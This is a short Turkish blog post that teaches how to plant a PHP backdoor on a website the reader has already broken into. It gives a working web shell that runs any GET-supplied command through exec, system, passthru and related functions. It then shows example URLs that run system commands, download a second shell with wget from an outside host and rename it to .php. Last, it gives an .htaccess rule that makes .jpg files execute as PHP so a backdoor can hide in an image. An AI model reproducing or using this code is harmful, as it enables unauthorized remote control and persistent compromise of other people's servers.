Kar Amacı Gütmeyen Blog

Siteye Backdoor Yerleştirmek - RCE

{ Merhaba AyarSecurity Takipçileri, Çok soruluyor, Aslında oldukça basit arkadaşlar
GET ile istediğimiz işlemi yapabiliriz ister index.php dosyasına ister herhangi bir php dosyasına yerleştirebiliriz.
Peki nasıl oluyor ? - Yazalım hemen.
<?php
$ayarsecurity= $_GET["ayar"];
if($ayarsecurity){
echo exec($ayarsecurity);
echo shell_exec($ayarsecurity);
echo proc_open($ayarsecurity);
echo system($ayarsecurity);
echo popen($ayarsecurity);
echo passthru($ayarsecurity);
}
?>
Şimdi geldi kullanmaya arkadaşlar, erişmiş olduğumuz sitede 
bir php dosyasının içine yukarıdaki kodları ekliyoruz ve şu şekilde komutlarımızı çalıştırıyoruz
www.siteadi.com/ayar.php?ayar=ls
uname, passwd, wget, curl vs. akla gelebilecek komutları istediğimiz gibi çalıştırabiliriz.
Şimdi istersek txt olarak shell çağıralım
www.siteadi.com/ayar.php?ayar=wget http://www.ayarsecurity.com/ornekshell.txt
Şimdi ise çektiğimiz .txt shelli php yapalım, peki neden txt olarak çektik ?
uzaktan direkt olarak php okuyamayız arkadaşlar önce txt olarak çekicez ki
sonrasında aşağıdaki komutumuzla .txt'i .php haline getireceğiz.
www.siteadi.com/ayar.php?ayar=mv ornekshell.txt ayar.php
Bu şekilde shellimizi ayar.php olarak aktif hale getirdik
Yalnız arkadaşlar bu fonksiyonlar disable edilmiş ise işimiz zorlaşacaktır.
o zamanda .htaccess ile .jpg uzantısını php gibi okutarak istediğimizi yapabiliriz
ve dizinde yine backdoor saklayabiliriz.
örnek olarak bir /dizin/ oluşturun içine .htaccess dosyası oluşturun ve içine şunu ekleyin.
AddType application/x-httpd-php .jpg
Şimdi arkadaşlar resim.jpg dosyası oluşturup kaynağına shell kodları ekleyebilirsiniz
resim.jpg yi php olarak çalıştıracak
İşin özü uzaktan komut çalıştıramıyorsak
 .htaccess ile yine backdoor yerleştirebiliriz. }

~ Hedef 2040 Yaşlı Bir Morrruk Olana Kadar Buradayım ~